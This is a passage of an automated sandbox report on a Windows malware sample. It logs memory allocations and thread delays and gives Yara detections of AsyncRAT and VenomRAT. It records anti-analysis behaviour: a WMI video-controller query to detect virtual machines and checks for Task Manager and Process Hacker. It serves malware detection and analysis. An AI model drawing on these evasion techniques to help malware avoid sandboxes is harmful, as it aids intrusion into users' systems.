                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Yara detected AsyncRAT
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Yara detected VenomRAT
                  Source: Yara matchFile source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 89B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 9BC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: ABC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 93C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: A3C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: A5D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: B5D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 2850000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 25F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 8CD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 7750000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 9CD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: ACD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 3090000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 3130000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: 5130000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: F70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory allocated: 4A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeMemory allocated: 1470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeMemory allocated: 3140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeMemory allocated: 5140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239844Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239703Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239594Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239483Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239375Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239266Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239141Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238904Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238797Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238677Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238558Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238451Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238294Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238157Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238034Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237726Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237367Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237171Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237047Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236932Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236806Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236652Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239875Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239715Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239532Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239407Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239277Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239156Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239031Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238919Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238697Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238593Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238475Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238250Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237532Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236953Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236492Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236367Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236157Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 239578
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 237203
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 237093
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236984
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236874
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236765
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236656
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236546
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236433
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236313
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236187
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236077
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235968
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235857
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235743
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235639
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235514
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 234291
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 234021
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233723
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233482
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233374
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233166
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 239781
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1412Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1355Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1205Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 714Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5463Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1651Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeWindow / User API: threadDelayed 690
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeWindow / User API: threadDelayed 3600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6370
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 588
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 8259
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1592
                  Source: C:\Windows\System32\loaddll64.exe TID: 6096Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239844s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239703s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239594s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239483s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239266s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239141s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239010s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238904s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238677s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238558s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238451s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238294s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238157s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238034s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237726s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237367s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237171s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237047s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236932s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236806s >= -30000sJump to behavior
